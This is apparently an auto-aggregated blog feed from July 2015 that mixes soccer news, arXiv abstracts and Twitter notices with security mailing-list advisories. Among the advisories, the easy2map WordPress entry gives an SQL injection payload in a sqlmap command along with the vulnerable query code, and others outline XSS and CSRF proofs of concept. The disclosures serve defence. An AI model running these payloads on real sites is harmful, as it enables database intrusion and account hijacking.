Latest YouTube Video

Saturday, July 4, 2015

Blatter opens up in interview on FIFA scandal and his role in it

BERLIN (AP) FIFA president Sepp Blatter said in a Sunday newspaper interview that French and German presidents applied political pressure before the 2018 and 2022 World Cups were awarded to Russia and Qatar, respectively.

from FOX Sports Digital http://ift.tt/1IBVXRW
via IFTTT

Messi fails again with Argentina's national team

SANTIAGO, Chile (AP) Lionel Messi has come up short again in his attempt to succeed with Argentina's national team.

from FOX Sports Digital http://ift.tt/1HEBygm
via IFTTT

Blatter: French, German presidents tried influence WCup vote

BERLIN (AP) FIFA president Sepp Blatter says in a newspaper interview that French and German presidents applied political pressure before the 2018 and 2022 World Cups were awarded to Russia and Qatar, respectively.

from FOX Sports Digital http://ift.tt/1KC1Y2O
via IFTTT

Copa America final penalty shootout

SANTIAGO, Chile (AP) How the penalty shootout unfolded in the Copa America final at Estadio Nacional on Saturday:

from FOX Sports Digital http://ift.tt/1IXML6c
via IFTTT

Chile beats Argentina 4-1 on penalties to win Copa America

SANTIAGO, Chile (AP) Goalkeeper Claudio Bravo made a save and striker Alexis Sanchez converted the winning penalty as host Chile defeated Argentina 4-1 in a shootout after a 0-0 draw in the Copa America final on Saturday, finally winning its first major title.

from FOX Sports Digital http://ift.tt/1TcQ5Sq
via IFTTT

Orioles Video: Manny Machado hits 2-run HR in 8th, but Chris Davis robbed of HR in 9th in 3-2 loss to White Sox (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles: Bud Norris moving to the bullpen, Kevin Gausman staying in the rotation, will start Tuesday vs. Twins (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Regimental Nicknames and Traditions of the British Army

Regimental Nicknames and Traditions of the British Army by Anonymous. Book Cover. Download; Bibrec. Bibliographic Record. Author, Anonymous.

from Google Alert - anonymous http://ift.tt/1Tcviym
via IFTTT

AP Exclusive: CONMEBOL head says 'we need total change'

SANTIAGO, Chile (AP) The president of CONMEBOL says it needs ''total and absolute change'' after becoming engulfed in the FIFA corruption scandal.

from FOX Sports Digital http://ift.tt/1CaFCm4
via IFTTT

2 Dinamo Zagreb bosses arrested over bribery charges

ZAGREB, Croatia (AP) Croatian police have arrested two Dinamo Zagreb bosses who are suspected of tax evasion and bribery.

from FOX Sports Digital http://ift.tt/1LOLlkG
via IFTTT

Here's How You Can Replace Your iPhone Battery For Free

Nothing is scarier than your iPhone alerting you that your battery had hit 5%, especially when you just took it off the charger with a 100 percent full battery about an hour ago.  To be very honest, it literally sucks. However, you no need to worry about this problem now, as there's a solution. Apple has just modified its warranty programs to make it easier for you to get your iPhone


from The Hacker News http://ift.tt/1KAy5zT
via IFTTT

[FD] Google HTTP Live Headers v1.0.6 - Client Side Cross Site Scripting Web Vulnerability

Document Title: =============== Google HTTP Live Headers v1.0.6 - Client Side Cross Site Scripting Web Vulnerability References (Source): ==================== http://ift.tt/1GQsZIA Release Date: ============= 2015-07-02 Vulnerability Laboratory ID (VL-ID): ==================================== 1541 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== The Chrome Web Store is Google`s online store for web applications for Google Chrome or Google Apps. It was announced at the Google I/O conference on May 19, 2010 by Vic Gundotra and released on December 6, 2010. The software allows users to install and run web applications for the Google Chrome browser. The Chrome Web Store user experience and design was created by Fi. Applications, browser themes and extensions in the store are written in HTML, CSS, JavaScript and Google Apps Script and, from Chrome 14, can use Google Native Client. The store hosts free and paid applications.An example of applications available in the store includes the game Plants vs. Zombies. The Store has been described as being like Google Play, but for `apps on the web`. A visual and UI overhaul of the store was announced on October 25, 2011. (Copy of the Homepage: http://ift.tt/1GWr5ad ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Google (Chrome Webstore) HTTP Live Headers v1.0.6 addon. Vulnerability Disclosure Timeline: ================================== 2015-07-02: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official Google (Chrome Webstore) HTTP Live Headers v1.0.6 addon. The non-persistent cross site vulnerability allows remote attackers to inject own script code to the client-side of the vulnerable online-service module. The vulnerability is located in the `url` value of the `HTTP LIVE HEADERS` module. Remote attackers are able to inject own script codes to client-side application requests. The attack vector is non persistent and the request method to inject/execute is GET. The vulnerable source is located in the google chrome http live headers v1.0.6 addon. The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] GET Vulnerable Module(s): [+] HTTP LIVE HEADERS Vulnerable File(s): [+] /webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo/reviews Vulnerable Parameter(s): [+] URL Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privilege application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC:
GET /#">

[FD] Ebay Inc Magento Bug Bounty #16 - CSRF Web Vulnerability

Document Title: =============== Ebay Inc Magento Bug Bounty #16 - CSRF Web Vulnerability References (Source): ==================== http://ift.tt/1GQsZIw Ebay Inc Security ID: EIBBP-31808 Release Date: ============= 2015-07-02 Vulnerability Laboratory ID (VL-ID): ==================================== 1472 Common Vulnerability Scoring System: ==================================== 2.5 Product & Service Introduction: =============================== Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side cross site request forgery web vulnerability in the official Magento Commerce online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-04-19: Researcher Notification & Coordination (Hadji Samir) 2015-04-20: Vendor Notification (eBay Inc Security Team - Bug Bounty Program) 2015-04-26: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program) 2015-06-15: Vendor Fix/Patch (Magento Developer Team) 2015-06-30: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program) 2015-07-02: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Magento - Connect Web Application 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A cross site request forgery web vulnerability has been discovered in the official Magento Commerce online service web-application. The vulnerability allows to execute functions without secure validation to compromise user content in the online service web-applicatio. The vulnerability is located in the /claim/claim/new/ id value POST method request of the magento connect claim module. Remote attackers with low privileged user accounts are able to perform a malicious request of other users without auth. The request method is POST and the issue attack vector is client-side (non-persistent). The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. Exploitation of the cross site request forgery vulnerability requires no privileged web application user account and no user interaction. Successful exploitation of the web vulnerability results in unauthorized execution of web functions via client-side in the users web context. Request Method(s): [+] POST Vulnerable Module(s): [+] magento-connect/claim/claim/new/ Proof of Concept (PoC): ======================= The csrf web vulnerability can be exploited by remote attackers without privileged application user account and medium or high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: magento-connect/claim/claim/new/
Note: The POST method request has no csrf token or key that protects the session data. Reference(s): http://ift.tt/gRsn9E http://ift.tt/P3pbMn http://ift.tt/1GWr3iB http://ift.tt/1GWr3iz Solution - Fix & Patch: ======================= The web vulnerability can be patched by implementation of a cross site request forgery token or a session key. Both prevents by protecting the session credentials and secure web module functions. Security Risk: ============== The security risk of the client-side cross site request forgery web vulnerability in the magento commerce application is estimated as medium. (CVSS 2.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] WK UDID v1.0.1 iOS - Command Inject Vulnerability

Gello: Cyanogen's Customizable Web Browser for Android

Get ready for a new Android Browser! Android ROM developer CyanogenMod has announced that it is working on a new browser for Android devices. Dubbed Gello, the open-source browser is based on Google's Chromium project and includes a ton of customization options for Android. The team provided a first look of Gello through a demo video that actually reveals a lot about the new Android


from The Hacker News http://ift.tt/1M1b4Dr
via IFTTT

This 20-year-old Student Has Written 100 Malware Programs in Two Years

Security firm Trend Micro has identified a 20-year-old Brazilian college student responsible for developing and distributing over 100 Banking Trojans selling each for around US$300. Known online as 'Lordfenix', 'Hacker's Son' and 'Filho de Hacker', the computer science student first began his career by posting in forums, asking for programming help for a Trojan he was developing,


from The Hacker News http://ift.tt/1falG8J
via IFTTT

Anonymous on Twitter: "Private Messages Leaked after Plex Forums Hack http://t.co/PAgC0LAb27 ...

... Gaber · McCourt Cordingley · OlgaMaria Carmen · Brady · RecKLeSS_DeaTH_ · Marccisi HD · Anonymous · News For Anons · Anonymous News.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/LatestAnonNews/status/617117580529025024&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNEcIkOh9SzSpDpOyoqsBl9XrCjDUQ
via IFTTT

Africa's soccer strongman a candidate for FIFA president?

DOUALA, Cameroon (AP) The son of a sultan from northern Cameroon, Issa Hayatou has ruled African soccer for 27 years and counting, a decade longer than Sepp Blatter has been in charge of FIFA.

from FOX Sports Digital http://ift.tt/1GWC02G
via IFTTT

Anonymous users can checkout

Anonymous users, in order to purchase a product and checkout must Be able to add an item to the cart Access checkout Have ability to enter a coupon ...

from Google Alert - anonymous http://ift.tt/1LNT6HH
via IFTTT

Re: [FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied

Venus and Jupiter are Far


On June 30 Venus and Jupiter were actually far apart, but both appeared close in western skies at dusk. Near the culmination of this year's gorgeous conjunction, the two bright evening planets are captured in the same telescopic field of view in this sharp digital stack of images taken after sunset from Poznań in west-central Poland. In fact, banded gas giant Jupiter was about 910 million kilometers from Poland. That's over 11 times farther than crescent Venus, only 78 million kilometers distant at the time. But since the diameter of giant planet Jupiter is over 11 times larger than Venus both planets show about the same angular size. Of course, 16th century Polish astronomer Nicolaus Copernicus would also have enjoyed the simultaneous telescopic view including Jupiter's four Galilean moons and a crescent Venus. Observations of Jupiter's moons and Venus' crescent phase were evidence for the Copernican or heliocentric model of the solar system. via NASA http://ift.tt/1f7lqY8

Friday, July 3, 2015

Orioles Video: Ubaldo Jimenez allows solo HR in 1-0 loss to White Sox; Adam Jones 0-for-3, now 1-for-33 vs. John Danks (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Peru beats Paraguay 2-0 to finish 3rd in Copa America

CONCEPCION, Chile (AP) Andre Carrillo and Paolo Guerrero each scored second-half goals to help Peru defeat Paraguay 2-0 in the third-place game at the Copa America on Friday.

from FOX Sports Digital http://ift.tt/1H5qsgN
via IFTTT

Dempsey, Chandler score as US beats Guatemala 4-0

NASHVILLE, Tenn. (AP) Clint Dempsey converted a penalty kick in his return from a suspension for a confrontation with a referee, Timmy Chandler scored his first international goal and the United States routed Guatemala 4-0 Friday night in an exhibition ahead of the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1IWTNbu
via IFTTT

Barcelona loans defender Martin Montoya to Inter Milan

BARCELONA, Spain (AP) Barcelona says it has agreed to loan its defender Martin Montoya to Inter Milan for a season.

from FOX Sports Digital http://ift.tt/1Kz5A5D
via IFTTT

Federico Fazzi (@federicofazzi) favorited one of your Tweets!

@mistermcguire: [FD] Snorby - Stored Cross-site Scripting Vulnerability   Federico Fazzi favorited your Tweet. View   Patrick McGuire @mistermcguire =   [FD] Snorby 2.6.2 - Stored Cross-site Scripting Vulnerability ift.tt/1KC3alc   Settings | Help | Opt-out | Download app Twitter, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103

Source: Gmail -> IFTTT-> Blogger

Orioles: Who is baseball's best manager? ESPN.com survey says Giants' Bruce Bochy, but Buck Showalter is best tactician (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Braxton Thomas
A page dedicated to saving the cats & kittens at the NYC ACC. NYC Urgent Cats is run by volunteers and NOT affiliated with the shelter.
Chadbourn town, NC, USA

Following: 1082 - Followers: 31

July 03, 2015 at 07:06PM via Twitter http://twitter.com/braxtonw92

Altidore, Dempsey rejoin US lineup against Guatemala

NASHVILLE, Tenn. (AP) Clint Dempsey and Jozy Altidore are back in the U.S. starting lineup, among five players U.S. coach Jurgen Klinsmann changed for Friday's exhibition against Guatemala ahead of the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1dDh6hD
via IFTTT

Re: [FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied

[FD] ipTIME n104r3 vulnerable to CSRF and XSS attacks

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [##2255763##] ManageEngine Password Manager Pro 8.1 SQL Injection vulnerability

Hi Blazej, Thanks for raising this issue. We have fixed the vulnerability and have released a hot fix release today. We will send out a security advisory to all our customers shortly. You can upgrade PMP to latest version or install the new version 8101 to fix the issue. You can access the release notes from the below mentioned link. http://ift.tt/1LNf51p Let us know if you have any further questions. Thanks & Regards,Mike [Technical Consultant | Password Manager Pro]

Source: Gmail -> IFTTT-> Blogger

[FD] SQL Injection in easy2map wordpress plugin v1.24

Title: SQL Injection in easy2map wordpress plugin v1.24 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-08 Download Site: http://ift.tt/1HAk8kN Vendor: Steven Ellis Vendor Notified: 2015-06-08, fixed in v1.25 Vendor Contact: http://ift.tt/1JDLwvL Advisory: http://ift.tt/1HAk8kP Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity. Vulnerability: The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or properly parameterize the query to the database. 90 $wpdb->query(sprintf("UPDATE $mapsTable 91 SET PolyLines = '%s' 92 WHERE ID = '%s';", $PolyLines, $mapID)); . . . 163 $wpdb->query(sprintf(" 164 UPDATE $mapsTable 165 SET TemplateID = '%s', 166 MapName = '%s', 167 Settings = '%s', 168 LastInvoked = CURRENT_TIMESTAMP, 169 CSSValues = '%s', 170 CSSValuesList = '%s', 171 CSSValuesHeading = '%s', 172 MapHTML = '%s', 173 IsActive = 1, 174 ThemeID = '%s' 175 WHERE ID = %s;", 176 $Items['mapTemplateName'], 177 $Items['mapName'], 178 urldecode($Items['mapSettingsXML']), 179 urldecode($Items["mapCSSXML"]), 180 urldecode($Items["listCSSXML"]), 181 urldecode($Items["headingCSSXML"]), 182 urldecode($Items["mapHTML"]), 183 $Items['mapThemeName'], 184 $mapID)); 185 } else { 186 187 //this is a map insert 188 if (!$wpdb->query(sprintf(" 189 INSERT INTO $mapsTable( 190 TemplateID, 191 MapName, 192 DefaultPinImage, 193 Settings, 194 LastInvoked, 195 PolyLines, 196 CSSValues, 197 CSSValuesList, 198 CSSValuesHeading, 199 MapHTML, 200 IsActive, 201 ThemeID 202 ) VALUES ('%s', '%s', '%s', '%s', 203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');", 204 $Items['mapTemplateName'], 205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png", 206 urldecode($Items['mapSettingsXML']), '', 207 urldecode($Items["mapCSSXML"]), 208 urldecode($Items["listCSSXML"]), 209 urldecode($Items["headingCSSXML"]), 210 urldecode($Items["mapHTML"]), 211 $Items['mapThemeName']))) . . 267 $wpdb->query(sprintf(" 268 UPDATE $mapsTable 269 SET MapName = '%s', 270 LastInvoked = CURRENT_TIMESTAMP, 271 IsActive = 1 272 WHERE ID = %s;", $mapName, $mapID)); In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory: 4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/"; . . 11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) { 12 13 if (!file_exists($imagesDirectory)) { 14 mkdir($imagesDirectory); 15 } CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug) OSVDB: Exploit Code: • $ sqlmap -u 'http://ift.tt/1TaHlfm' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=‘COOKIE HERE’ --level=5 --risk=3

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied

[FD] Snorby 2.6.2 - Stored Cross-site Scripting Vulnerability

----------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) with Safari. DW

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [oss-security] Re: Google Chrome Address Spoofing (Request For Comment)

Sonata à 4 in D major, S-Uu 11:15 (Anonymous)

Universitetsbibliotek, Uppsala (S-Uu): Instr.mus.i hs. 11:15. This file is based on high-resolution images obtained from the source using a method ...

from Google Alert - anonymous http://ift.tt/1LNbS1D
via IFTTT

Working with anonymous donors

If your organization would like to attract funds from these types of donors, you should be aware of why people remain anonymous and how you can ...

from Google Alert - anonymous http://ift.tt/1LNbRLk
via IFTTT

I have a new follower on Twitter


Selinda Bianco
I wanna be a writer when i grow up :)


Following: 613 - Followers: 368

July 03, 2015 at 02:35PM via Twitter http://twitter.com/LovelySelinda

Shanghai to host Italian Super Cup between Juve and Lazio

MILAN (AP) The Italian Super Cup between Juventus and Lazio will be played Aug. 8 in Shanghai.

from FOX Sports Digital http://ift.tt/1IVJRPw
via IFTTT

Barcelona loans defender Montoya Torralbo to Inter Milan

BARCELONA, Spain (AP) Barcelona says it has agreed to loan its defender Martin Montoya Torralbo to Inter Milan for a season.

from FOX Sports Digital http://ift.tt/1C6BQtU
via IFTTT

Present a message to Anonymous submitter that they are limited to one submission

I'm trying to avail myself of the experimental session ID tracking feature for anonymous submitters. The form (a petition) is limited to one submission ...

from Google Alert - anonymous http://ift.tt/1Iz0VyQ
via IFTTT

Udinese presents Ali Adnan as first Iraqi player in Serie A

UDINE, Italy (AP) Fullback Ali Adnan Kadhim has been presented as the first Iraqi player in Serie A.

from FOX Sports Digital http://ift.tt/1GTNMMp
via IFTTT

UEFA lifts Man City, PSG sanctions after clubs curb spending

NYON, Switzerland (AP) UEFA has lifted key Financial Fair Play sanctions from Manchester City and Paris Saint-Germain after both clubs met spending limits imposed last year.

from FOX Sports Digital http://ift.tt/1dBE34X
via IFTTT

Lyon signing of Beauvue clears path for Lacazette sale

PARIS (AP) Lyon has signed prolific forward Claudio Beauvue from Guingamp, clearing the way to sell in-demand top-scorer Alexandre Lacazette.

from FOX Sports Digital http://ift.tt/1UgHgZ2
via IFTTT

Indonesian tsunami survivor joins Sporting Lisbon as trainee

LISBON, Portugal (AP) An Indonesian who as a child survived the 2004 earthquake-tsunami that hit his country and was found wearing a Portugal soccer jersey is joining Sporting Lisbon's training academy.

from FOX Sports Digital http://ift.tt/1HAIXeC
via IFTTT

Nicolas Anelka to manage as well as play for Mumbai City

MUMBAI, India (AP) Former France striker Nicolas Anelka agreed to player-manage Mumbai City on Friday in his second season with the Indian Super League club.

from FOX Sports Digital http://ift.tt/1GUePGp
via IFTTT

Berlusconi demands AC Milan return to Champions League

MILAN (AP) AC Milan president Silvio Berlusconi has demanded new coach Sinisa Mihajlovic to lead the club back into the Champions League.

from FOX Sports Digital http://ift.tt/1dBq4vZ
via IFTTT

Brazilian refs sending message to players: Stop the whining!

SAO PAULO (AP) Brazilian referees are done with tolerating whining players.

from FOX Sports Digital http://ift.tt/1T9AF1c
via IFTTT

North America Runs Out of IPv4 Addresses

The Internet is running out of IPv4 (Internet Protocol version 4) addresses — a computer’s unique address on the Internet. It’s just become harder to get IPv4 addresses. IPv4 Exhaustion Gets Real. Is this the end of IPv4 addresses? Finally, North America ran out of iPv4 addresses and officially exhausted its supply of IPv4 addresses, joining Asia, Europe, and Latin America. <!--


from The Hacker News http://ift.tt/1IxPhEs
via IFTTT

I have a new follower on Twitter


PhysicsForums.com
Join the largest & highest quality science community with 200K+ members. Discussions in #physics, #astronomy, #STEM, #engineering, #math etc!
USA
http://t.co/Pu7YM1JW5Y
Following: 2109 - Followers: 4812

July 03, 2015 at 03:57AM via Twitter http://twitter.com/physicsforums

Let's Take a Selfie to Shop Online With MasterCard

Difficulty in remembering complicated Passwords? Forget Passwords and Fingerprints now – and get ready to authenticate your online purchases with your SELFIES. MasterCard is experimenting a new app that would let you make online purchases by taking a selfie rather than typing a password, moving a step forward in the mobile payments evolution. This experimental ID Check security system


from The Hacker News http://ift.tt/1KwPERt
via IFTTT

Anonymous 4 comes to Rockport on farewell tour

Anonymous 4, the popular, eclectic, and wildly successful female a cappella vocal quartet, comes to the Rockport Chamber Music Festival on its final ...

from Google Alert - anonymous http://ift.tt/1KwNYar
via IFTTT

I have a new follower on Twitter


AixaM,n,c,k,s
These are my tweets, I think they are fun, jlife is nice and fun:P


Following: 1270 - Followers: 265

July 03, 2015 at 01:52AM via Twitter http://twitter.com/AixaMincks

Copa America: Argentina, Chile trying to end title drought

SANTIAGO, Chile (AP) The South American title won't be the only thing at stake when Argentina and Chile meet in Saturday's Copa America final.

from FOX Sports Digital http://ift.tt/1Cfj4AR
via IFTTT

Venus and Jupiter are Close


On June 30, Venus and Jupiter were close in western skies at dusk. Near the culmination of this year's gorgeous conjunction, the two bright evening planets are captured in the same telescopic field of view in this image taken after sunset from Bejing, China. As the two bright planets set together in the west, a nearly Full Moon rose above the horizon to the south and east. Imaged that night with the same telescope and camera, the rising Moon from the opposite part of the sky is compared with the planetary conjunction for scale in the digitally composited image. The full lunar disk covers an angle of about 1/2 degree on the sky. Visible as well in binoculars and small telescopes are Venus' crescent and Jupiter's four Galilean moons. Of course, Venus and Jupiter are still close. via NASA http://ift.tt/1Ub1e7E

Thursday, July 2, 2015

I have a new follower on Twitter


Matrix

atlanta, ga

Following: 1144 - Followers: 144

July 02, 2015 at 11:29PM via Twitter http://twitter.com/matrix_daily

Orioles Video: LF David Lough crashes into wall to make catch, robs another hit with sliding catch in loss to Rangers (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ro0ted on Twitter: "#Anonymous Shuts Down Canada Spy Agency Website #OpbillC51 https://t.co ...

#Anonymous Shuts Down Canada Spy Agency Website #OpbillC51 ... @ro0ted @AnonOpsSE Ehehhh, "The online hacktivist Anonymous conducted.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/ro0ted/status/616325621514391553&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFgXQzOvE7rk7jnC7PE8Bcf-FblcA
via IFTTT

An Empirical Evaluation of True Online TD({\lambda}). (arXiv:1507.00353v1 [cs.AI])

The true online TD({\lambda}) algorithm has recently been proposed (van Seijen and Sutton, 2014) as a universal replacement for the popular TD({\lambda}) algorithm, in temporal-difference learning and reinforcement learning. True online TD({\lambda}) has better theoretical properties than conventional TD({\lambda}), and the expectation is that it also results in faster learning. In this paper, we put this hypothesis to the test. Specifically, we compare the performance of true online TD({\lambda}) with that of TD({\lambda}) on challenging examples, random Markov reward processes, and a real-world myoelectric prosthetic arm. We use linear function approximation with tabular, binary, and non-binary features. We assess the algorithms along three dimensions: computational cost, learning speed, and ease of use. Our results confirm the strength of true online TD({\lambda}): 1) for sparse feature vectors, the computational overhead with respect to TD({\lambda}) is minimal; for non-sparse features the computation time is at most twice that of TD({\lambda}), 2) across all domains/representations the learning speed of true online TD({\lambda}) is often better, but never worse than that of TD({\lambda}), and 3) true online TD({\lambda}) is easier to use, because it does not require choosing between trace types, and it is generally more stable with respect to the step-size. Overall, our results suggest that true online TD({\lambda}) should be the first choice when looking for an efficient, general-purpose TD method.



from cs.AI updates on arXiv.org http://ift.tt/1UeFIPr
via IFTTT

Fast Convergence of Regularized Learning in Games. (arXiv:1507.00407v1 [cs.GT])

We show that natural classes of regularized learning algorithms with a form of recency bias achieve faster convergence rates to approximate efficiency and to correlated equilibria in multiplayer normal form games. When each player in a game uses an algorithm from our class, their individual regret decays at $O(T^{-3/4})$, while the sum of utilities converges to an approximate optimum at $O(T^{-1})$--an improvement upon the worst case $O(T^{-1/2})$ rates. We show a black-box reduction for any algorithm in the class to achieve $O(T^{-1/2})$ rates against an adversary, while maintaining the faster rates against algorithms in the class. Our results extend those of [Rakhlin and Shridharan 2013] and [Daskalakis et al. 2014], who only analyzed two-player zero-sum games for specific algorithms.



from cs.AI updates on arXiv.org http://ift.tt/1JB6JcL
via IFTTT

Online Transfer Learning in Reinforcement Learning Domains. (arXiv:1507.00436v1 [cs.AI])

This paper proposes an online transfer framework to capture the interaction among agents and shows that current transfer learning in reinforcement learning is a special case of online transfer. Furthermore, this paper re-characterizes existing agents-teaching-agents methods as online transfer and analyze one such teaching method in three ways. First, the convergence of Q-learning and Sarsa with tabular representation with a finite budget is proven. Second, the convergence of Q-learning and Sarsa with linear function approximation is established. Third, the we show the asymptotic performance cannot be hurt through teaching. Additionally, all theoretical results are empirically validated.



from cs.AI updates on arXiv.org http://ift.tt/1LYiOWK
via IFTTT

Self-Learning Cloud Controllers: Fuzzy Q-Learning for Knowledge Evolution. (arXiv:1507.00567v1 [cs.SY])

Cloud controllers aim at responding to application demands by automatically scaling the compute resources at runtime to meet performance guarantees and minimize resource costs. Existing cloud controllers often resort to scaling strategies that are codified as a set of adaptation rules. However, for a cloud provider, applications running on top of the cloud infrastructure are more or less black-boxes, making it difficult at design time to define optimal or pre-emptive adaptation rules. Thus, the burden of taking adaptation decisions often is delegated to the cloud application. Yet, in most cases, application developers in turn have limited knowledge of the cloud infrastructure. In this paper, we propose learning adaptation rules during runtime. To this end, we introduce FQL4KE, a self-learning fuzzy cloud controller. In particular, FQL4KE learns and modifies fuzzy rules at runtime. The benefit is that for designing cloud controllers, we do not have to rely solely on precise design-time knowledge, which may be difficult to acquire. FQL4KE empowers users to specify cloud controllers by simply adjusting weights representing priorities in system goals instead of specifying complex adaptation rules. The applicability of FQL4KE has been experimentally assessed as part of the cloud application framework ElasticBench. The experimental results indicate that FQL4KE outperforms our previously developed fuzzy controller without learning mechanisms and the native Azure auto-scaling.



from cs.AI updates on arXiv.org http://ift.tt/1IwX1GP
via IFTTT

Scalable Link Prediction in Dynamic Networks via Non-Negative Matrix Factorization. (arXiv:1411.3675v2 [cs.SI] UPDATED)

We propose a scalable temporal latent space model for link prediction in dynamic social networks, where the goal is to predict links over time based on a sequence of previous graph snapshots. The model assumes that each user lies in an unobserved latent space and interactions are more likely to form between similar users in the latent space representation. In addition, the model allows each user to gradually move its position in the latent space as the network structure evolves over time. We present a global optimization algorithm to effectively infer the temporal latent space, with a quadratic convergence rate. Two alternative optimization algorithms with local and incremental updates are also proposed, allowing the model to scale to larger networks without compromising prediction accuracy. Empirically, we demonstrate that our model, when evaluated on a number of real-world dynamic networks, significantly outperforms existing approaches for temporal link prediction in terms of both scalability and predictive power.



from cs.AI updates on arXiv.org http://ift.tt/1uicHXs
via IFTTT

Bradley replaces Dempsey as US captain for CONCACAF Gold Cup

CHICAGO (AP) Michael Bradley will be the U.S. captain for the CONCACAF Gold Cup rather than Clint Dempsey.

from FOX Sports Digital http://ift.tt/1GSCwPj
via IFTTT

Guzan, US seek to maintain momentum against Guatemala

